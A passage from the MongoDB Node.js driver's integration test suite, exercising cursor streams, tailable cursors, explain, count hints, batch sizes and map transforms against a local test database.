configuration.writeConcernMax(), function(err) { test.equal(null, err); var stream = collection.find().stream(); stream.on('data', function() { i++; }); stream.once('close', testDone('close')); stream.once('error', testDone('error')); stream.destroy(); function testDone() { return function(err) { ++doneCalled; if (doneCalled === 1) { test.equal(undefined, err); test.strictEqual(0, i); test.strictEqual(true, stream.isClosed()); client.close(); done(); } }; } }); } ); }); } }); /** * @ignore * @api private */ it('destroying a stream stops it', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.createCollection('destroying_a_stream_stops_it', function(err, collection) { test.equal(null, err); var docs = []; for (var ii = 0; ii < 10; ++ii) docs.push({ b: ii + 1 }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = 0, i = 0; var stream = collection.find().stream(); test.strictEqual(false, stream.isClosed()); stream.on('data', function() { if (++i === 5) { stream.destroy(); } }); stream.once('close', testDone); stream.once('error', testDone); function testDone(err) { ++finished; setTimeout(function() { test.strictEqual(undefined, err); test.strictEqual(5, i); test.strictEqual(1, finished); test.strictEqual(true, stream.isClosed()); client.close(); done(); }, 150); } }); }); }); } }); /** * @ignore * @api private */ it('cursor stream errors', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; if (configuration.usingUnifiedTopology()) { // skipped for direct legacy variable inspection return this.skip(); } var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.createCollection('cursor_stream_errors', function(err, collection) { test.equal(null, err); var docs = []; for (var ii = 0; ii < 10; ++ii) docs.push({ b: ii + 1 }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = 0, i = 0; var stream = collection.find({}, { batchSize: 5 }).stream(); stream.on('data', function() { if (++i === 4) { // Force restart configuration.manager.stop(9); } }); stream.once('close', testDone('close')); stream.once('error', testDone('error')); function testDone() { return function() { ++finished; if (finished === 2) { setTimeout(function() { test.equal(5, i); test.equal(true, stream.isClosed()); client.close(); configuration.manager.start().then(function() { done(); }); }, 150); } }; } }); }); }); } }); /** * @ignore * @api private */ it('cursor stream errors connection force closed', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { mongodb: '<=3.5.0', // NOTE: remove this when SERVER-30576 is resolved topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.createCollection('cursor_stream_errors', function(err, collection) { test.equal(null, err); var docs = []; for (var ii = 0; ii < 10; ++ii) docs.push({ b: ii + 1 }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = 0, i = 0; var stream = collection.find({}, { batchSize: 5 }).stream(); stream.on('data', function() { if (++i === 5) { client.topology .connections()[0] .write(Buffer.from('312312321321askdjljsaNCKnablibh')); } }); stream.once('close', testDone('close')); stream.once('error', testDone('error')); function testDone() { return function() { ++finished; if (finished === 2) { setTimeout(function() { test.equal(5, i); test.equal(2, finished); test.equal(true, stream.isClosed()); client.close(); done(); }, 150); } }; } }); }); }); } }); /** * @ignore * @api private */ it('cursor stream pipe', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('cursor_stream_pipe', function(err, collection) { test.equal(null, err); var docs = []; 'Aaden Aaron Adrian Aditya Bob Joe'.split(' ').forEach(function(name) { docs.push({ name: name }); }); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var filename = '/tmp/_nodemongodbnative_stream_out.txt', out = fs.createWriteStream(filename); // hack so we don't need to create a stream filter just to // stringify the objects (otherwise the created file would // just contain a bunch of [object Object]) // var toString = Object.prototype.toString; // Object.prototype.toString = function () { // return JSON.stringify(this); // } var stream = collection.find().stream({ transform: function(doc) { return JSON.stringify(doc); } }); stream.pipe(out); // Wait for output stream to close out.on('close', testDone); function testDone(err) { // Object.prototype.toString = toString; test.strictEqual(undefined, err); var contents = fs.readFileSync(filename, 'utf8'); test.ok(/Aaden/.test(contents)); test.ok(/Aaron/.test(contents)); test.ok(/Adrian/.test(contents)); test.ok(/Aditya/.test(contents)); test.ok(/Bob/.test(contents)); test.ok(/Joe/.test(contents)); fs.unlinkSync(filename); client.close(); done(); } }); }); }); } }); /** * @ignore */ it('shouldCloseDeadTailableCursors', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] }, sessions: { skipLeakTests: true } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 10000000 }; db.createCollection('test_if_dead_tailable_cursors_close', options, function( err, collection ) { test.equal(null, err); var closeCount = 0; var errorOccurred = false; var count = 100; // Just hammer the server for (var i = 0; i < 100; i++) { collection.insert({ id: i }, { w: 'majority', wtimeout: 5000 }, function(err) { test.equal(null, err); count = count - 1; if (count === 0) { var stream = collection.find({}, { tailable: true, awaitData: true }).stream(); // let index = 0; stream.resume(); stream.on('error', function(err) { expect(err).to.exist; errorOccurred = true; }); var validator = () => { closeCount++; if (closeCount === 2) { expect(errorOccurred).to.equal(true); done(); } }; stream.on('end', validator); stream.on('close', validator); // Just hammer the server for (var i = 0; i < 100; i++) { const id = i; process.nextTick(function() { collection.insert({ id }, function(err) { test.equal(null, err); if (id === 99) { setTimeout(() => client.close()); } }); }); } } }); } }); }); } }); /** * @ignore */ it('shouldAwaitData', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data', options, function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection.find({}, { tailable: true, awaitdata: true }); // Execute each cursor.each(function(err, result) { if (result) { cursor.kill(); } if (err != null) { // Even though cursor is exhausted, should not close session // // unless cursor is manually closed, due to awaitdata / tailable cursor.close(); client.close(); done(); } }); }); }); }); } }); /** * @ignore */ it('shouldAwaitDataWithDocumentsAvailable', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data_no_docs', options, function(err, collection) { test.equal(null, err); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection.find({}, { tailable: true, awaitdata: true }); var rewind = cursor.rewind; var called = false; cursor.rewind = function() { called = true; }; cursor.each(function(err) { if (err != null) { test.ok(called); cursor.rewind = rewind; client.close(); done(); } }); }); }); } }); /** * @ignore */ it('shouldAwaitDataUsingCursorFlag', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data_cursor_flag', options, function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection.find({}, {}); cursor.addCursorFlag('tailable', true); cursor.addCursorFlag('awaitData', true); cursor.each(function(err) { if (err != null) { // Even though cursor is exhausted, should not close session // unless cursor is manually closed, due to awaitdata / tailable cursor.close(); client.close(); done(); } else { cursor.kill(); } }); }); }); }); } }); /** * @ignore */ /* it('shouldNotAwaitDataWhenFalse = { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // NODE-98 var db = configuration.newClient(configuration.writeConcernMax(), {poolSize:1, auto_reconnect:false}); db.open(function(err, db) { var options = { capped: true, size: 8}; db.createCollection('should_not_await_data_when_false', options, function(err, collection) { collection.insert({a:1}, configuration.writeConcernMax(), function(err, result) { // should not timeout collection.find({}, {tailable:true, awaitdata:false}).each(function(err, result) { test.ok(err != null); }); client.close(); done(); }); }); }); } } */ /** * @ignore */ it('Should correctly retry tailable cursor connection', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { // http://www.mongodb.org/display/DOCS/Tailable+Cursors var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var options = { capped: true, size: 8 }; db.createCollection('should_await_data', options, function(err, collection) { test.equal(null, err); collection.insert({ a: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create cursor with awaitdata, and timeout after the period specified var cursor = collection.find({}, { tailable: true, awaitdata: true }); cursor.each(function(err) { if (err != null) { // kill cursor b/c cursor is tailable / awaitable cursor.close(); client.close(); done(); } else { cursor.kill(); } }); }); }); }); } }); /** * @ignore */ it('shouldCorrectExecuteExplainHonoringLimit', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; docs[0] = { _keywords: [ 'compact', 'ii2gd', 'led', '24-48v', 'presse-etoupe', 'bexbgl1d24483', 'flash', '48v', 'eexd', 'feu', 'presse', 'compris', 'rouge', 'etoupe', 'iic', 'ii2gdeexdiict5', 'red', 'aet' ] }; docs[1] = { _keywords: [ 'reducteur', '06212', 'd20/16', 'manch', 'd20', 'manchon', 'ard', 'sable', 'irl', 'red' ] }; docs[2] = { _keywords: [ 'reducteur', '06214', 'manch', 'd25/20', 'd25', 'manchon', 'ard', 'sable', 'irl', 'red' ] }; docs[3] = { _keywords: [ 'bar', 'rac', 'boite', '6790178', '50-240/4-35', '240', 'branch', 'coulee', 'ddc', 'red', 'ip2x' ] }; docs[4] = { _keywords: [ 'bar', 'ip2x', 'boite', '6790158', 'ddi', '240', 'branch', 'injectee', '50-240/4-35?', 'red' ] }; docs[5] = { _keywords: [ 'bar', 'ip2x', 'boite', '6790179', 'coulee', '240', 'branch', 'sdc', '50-240/4-35?', 'red', 'rac' ] }; docs[6] = { _keywords: [ 'bar', 'ip2x', 'boite', '6790159', '240', 'branch', 'injectee', '50-240/4-35?', 'sdi', 'red' ] }; docs[7] = { _keywords: [ '6000', 'r-6000', 'resin', 'high', '739680', 'red', 'performance', 'brd', 'with', 'ribbon', 'flanges' ] }; docs[8] = { _keywords: ['804320', 'for', 'paint', 'roads', 'brd', 'red'] }; docs[9] = { _keywords: ['38mm', 'padlock', 'safety', '813594', 'brd', 'red'] }; docs[10] = { _keywords: ['114551', 'r6900', 'for', 'red', 'bmp71', 'brd', 'ribbon'] }; docs[11] = { _keywords: ['catena', 'diameter', '621482', 'rings', 'brd', 'legend', 'red', '2mm'] }; docs[12] = { _keywords: ['catena', 'diameter', '621491', 'rings', '5mm', 'brd', 'legend', 'red'] }; docs[13] = { _keywords: ['catena', 'diameter', '621499', 'rings', '3mm', 'brd', 'legend', 'red'] }; docs[14] = { _keywords: ['catena', 'diameter', '621508', 'rings', '5mm', 'brd', 'legend', 'red'] }; docs[15] = { _keywords: [ 'insert', 'for', 'cable', '3mm', 'carrier', '621540', 'blank', 'brd', 'ademark', 'red' ] }; docs[16] = { _keywords: [ 'insert', 'for', 'cable', '621544', '3mm', 'carrier', 'brd', 'ademark', 'legend', 'red' ] }; docs[17] = { _keywords: ['catena', 'diameter', '6mm', '621518', 'rings', 'brd', 'legend', 'red'] }; docs[18] = { _keywords: ['catena', 'diameter', '621455', '8mm', 'rings', 'brd', 'legend', 'red'] }; docs[19] = { _keywords: ['catena', 'diameter', '621464', 'rings', '5mm', 'brd', 'legend', 'red'] }; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); // Insert all the docs var collection = db.collection('shouldCorrectExecuteExplainHonoringLimit'); collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.ensureIndex({ _keywords: 1 }, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({ _keywords: 'red' }, {}, { explain: true }) .limit(10) .toArray(function(err, result) { test.equal(null, err); test.ok(result != null); collection .find({ _keywords: 'red' }, {}) .limit(10) .explain(function(err, result) { test.equal(null, err); test.ok(result != null); client.close(); done(); }); }); }); }); }); } }); /** * @ignore */ it('shouldNotExplainWhenFalse', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var doc = { name: 'camera', _keywords: ['compact', 'ii2gd', 'led', 'red', 'aet'] }; var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldNotExplainWhenFalse'); collection.insert(doc, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({ _keywords: 'red' }, {}, { explain: false }) .limit(10) .toArray(function(err, result) { test.equal(null, err); test.equal('camera', result[0].name); client.close(); done(); }); }); }); } }); /** * @ignore */ it('shouldFailToSetReadPreferenceOnCursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); try { db .collection('shouldFailToSetReadPreferenceOnCursor') .find() .setReadPreference('notsecondary'); test.ok(false); } catch (err) {} // eslint-disable-line db .collection('shouldFailToSetReadPreferenceOnCursor') .find() .setReadPreference('secondary'); client.close(); done(); }); } }); /** * @ignore * @api private */ it('shouldNotFailDueToStackOverflowEach', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('shouldNotFailDueToStackOverflowEach', function(err, collection) { test.equal(null, err); var docs = []; var total = 0; for (var i = 0; i < 30000; i++) docs.push({ a: i }); var allDocs = []; var left = 0; while (docs.length > 0) { allDocs.push(docs.splice(0, 1000)); } // Get all batches we must insert left = allDocs.length; var totalI = 0; // Execute inserts for (i = 0; i < left; i++) { collection.insert(allDocs.shift(), configuration.writeConcernMax(), function(err, d) { test.equal(null, err); left = left - 1; totalI = totalI + d.length; if (left === 0) { collection.find({}).each(function(err, item) { test.equal(null, err); if (item == null) { test.equal(30000, total); client.close(); done(); } else { total++; } }); } }); } }); }); } }); /** * @ignore * @api private */ it('shouldNotFailDueToStackOverflowToArray', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('shouldNotFailDueToStackOverflowToArray', function(err, collection) { test.equal(null, err); var docs = []; for (var i = 0; i < 30000; i++) docs.push({ a: i }); var allDocs = []; var left = 0; while (docs.length > 0) { allDocs.push(docs.splice(0, 1000)); } // Get all batches we must insert left = allDocs.length; var totalI = 0; var timeout = 0; // Execute inserts for (i = 0; i < left; i++) { setTimeout(function() { collection.insert(allDocs.shift(), configuration.writeConcernMax(), function(err, d) { test.equal(null, err); left = left - 1; totalI = totalI + d.length; if (left === 0) { collection.find({}).toArray(function(err, items) { test.equal(null, err); test.equal(30000, items.length); client.close(); done(); }); } }); }, timeout); timeout = timeout + 100; } }); }); } }); /** * @ignore * @api private */ it('shouldCorrectlySkipAndLimit', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldCorrectlySkipAndLimit'); var docs = []; for (var i = 0; i < 100; i++) docs.push({ a: i, OrderNumber: i }); collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection .find({}, { OrderNumber: 1 }) .skip(10) .limit(10) .toArray(function(err, items) { test.equal(null, err); test.equal(10, items[0].OrderNumber); collection .find({}, { OrderNumber: 1 }) .skip(10) .limit(10) .count(true, function(err, count) { test.equal(null, err); test.equal(10, count); client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('shouldFailToTailANormalCollection', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var collection = db.collection('shouldFailToTailANormalCollection'); var docs = []; for (var i = 0; i < 100; i++) docs.push({ a: i, OrderNumber: i }); collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); const cursor = collection.find({}, { tailable: true }); cursor.each(function(err) { test.ok(err instanceof Error); test.ok(typeof err.code === 'number'); // Close cursor b/c we did not exhaust cursor cursor.close(); client.close(); done(); }); }); }); } }); /** * @ignore */ it('shouldCorrectlyUseFindAndCursorCount', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); // DOC_LINE var client = new MongoClient(new Server('localhost', 27017)); // DOC_START // Establish connection to db client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); // Create a lot of documents to insert var docs = []; for (var i = 0; i < 100; i++) { docs.push({ a: i }); } // Create a collection db.createCollection('test_close_function_on_cursor_2', function(err, collection) { test.equal(null, err); // Insert documents into collection collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); collection.find({}, function(err, cursor) { test.equal(null, err); cursor.count(function(err, count) { test.equal(null, err); test.equal(100, count); client.close(); done(); }); }); }); }); }); // DOC_END } }); /** * @ignore */ it('should correctly apply hint to count command for cursor', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'], mongodb: '>2.5.5' } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); // DOC_LINE var client = new MongoClient(new Server('localhost', 27017)); // DOC_START // Establish connection to db client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); var col = db.collection('count_hint'); col.insert([{ i: 1 }, { i: 2 }], { w: 1 }, function(err) { test.equal(null, err); col.ensureIndex({ i: 1 }, function(err) { test.equal(null, err); col.find({ i: 1 }, { hint: '_id_' }).count(function(err, count) { test.equal(null, err); test.equal(1, count); col.find({}, { hint: '_id_' }).count(function(err, count) { test.equal(null, err); test.equal(2, count); col.find({ i: 1 }, { hint: 'BAD HINT' }).count(function(err) { test.ok(err != null); col.ensureIndex({ x: 1 }, { sparse: true }, function(err) { test.equal(null, err); col.find({ i: 1 }, { hint: 'x_1' }).count(function(err, count) { test.equal(null, err); test.equal(0, count); col.find({}, { hint: 'i_1' }).count(function(err, count) { test.equal(null, err); test.equal(2, count); client.close(); done(); }); }); }); }); }); }); }); }); }); // DOC_END } }); /** * @ignore */ it('Terminate each after first document by returning false', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); // Create a lot of documents to insert var docs = []; for (var i = 0; i < 100; i++) { docs.push({ a: i }); } // Create a collection db.createCollection('terminate_each_returning_false', function(err, collection) { test.equal(null, err); // Insert documents into collection collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); var finished = false; collection.find({}).each(function(err, doc) { test.equal(null, err); if (doc) { test.equal(finished, false); finished = true; client.close(); done(); return false; } }); }); }); }); } }); /** * @ignore */ it('Should correctly handle maxTimeMS as part of findOne options', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var donkey = { color: 'brown' }; db.collection('donkies').insertOne(donkey, function(err, result) { test.equal(null, err); var query = { _id: result.insertedId }; var options = { maxTimeMS: 1000 }; db.collection('donkies').findOne(query, options, function(err, doc) { test.equal(null, err); test.equal('brown', doc.color); client.close(); done(); }); }); }); } }); /** * @ignore */ it('Should correctly handle batchSize of 2', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db .collection('should_correctly_handle_batchSize_2') .insert([{ x: 1 }, { x: 2 }, { x: 3 }], function(err) { test.equal(null, err); db .collection('should_correctly_handle_batchSize_2') .find({}, { batchSize: 2 }, function(error, cursor) { test.equal(null, err); cursor.next(function(err) { test.equal(null, err); cursor.next(function(err) { test.equal(null, err); cursor.next(function(err) { client.close(); test.equal(null, err); done(); }); }); }); }); }); }); } }); /** * @ignore */ it('Should report database name and collection name', { metadata: { requires: { topology: ['single'] } }, // The actual test we wish to run test: function(done) { var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); db.collection('myCollection').find({}, function(error, cursor) { test.equal(null, err); test.equal('myCollection', cursor.namespace.collection); test.equal('integration_tests', cursor.namespace.database); client.close(); done(); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor with maxTimeMS', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_2', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor.limit(100); cursor.skip(10); cursor.count(true, { maxTimeMS: 1000 }, function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}); cursor.limit(100); cursor.skip(10); cursor.maxTimeMS(100); cursor.count(function(err) { test.equal(null, err); client.close(); done(); }); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly execute count on cursor with maxTimeMS set using legacy method', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { test.equal(null, err); var db = client.db(configuration.db); db.createCollection('Should_correctly_execute_count_on_cursor_3', function( err, collection ) { test.equal(null, err); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection.find({}, { maxTimeMS: 100 }); cursor.toArray(function(err) { test.equal(null, err); client.close(); done(); }); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to toArray', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_toArray'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.toArray(function(err, docs) { test.equal(null, err); test.equal(10, docs.length); // Ensure all docs where mapped docs.forEach(function(x) { test.equal(1, x.a); }); client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to next', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_next'); // insert all docs collection.insert(docs, configuration.writeConcernMax(), function(err) { test.equal(null, err); // Create a cursor for the content var cursor = collection .find({}) .map(function() { return { a: 1 }; }) .batchSize(5) .limit(10); cursor.next(function(err, doc) { test.equal(null, err); test.equal(1, doc.a); // Close cursor b/c we did not exhaust cursor cursor.close(); client.close(); done(); }); }); }); } }); /** * @ignore * @api private */ it('Should correctly apply map to each', { // Add a tag that our runner can trigger on // in this case we are setting that node needs to be higher than 0.10.X to run metadata: { requires: { topology: ['single', 'replicaset', 'sharded', 'ssl', 'heap', 'wiredtiger'] } }, // The actual test we wish to run test: function(done) { var docs = []; for (var i = 0; i < 1000; i++) { var d = new Date().getTime() + i * 1000; docs[i] = { a: i, createdAt: new Date(d) }; } var configuration = this.configuration; var client = configuration.newClient(configuration.writeConcernMax(), { poolSize: 1 }); client.connect(function(err, client) { var db = client.db(configuration.db); test.equal(null, err); var collection = db.collection('map_each'); // insert all docs collection.insert(docs, 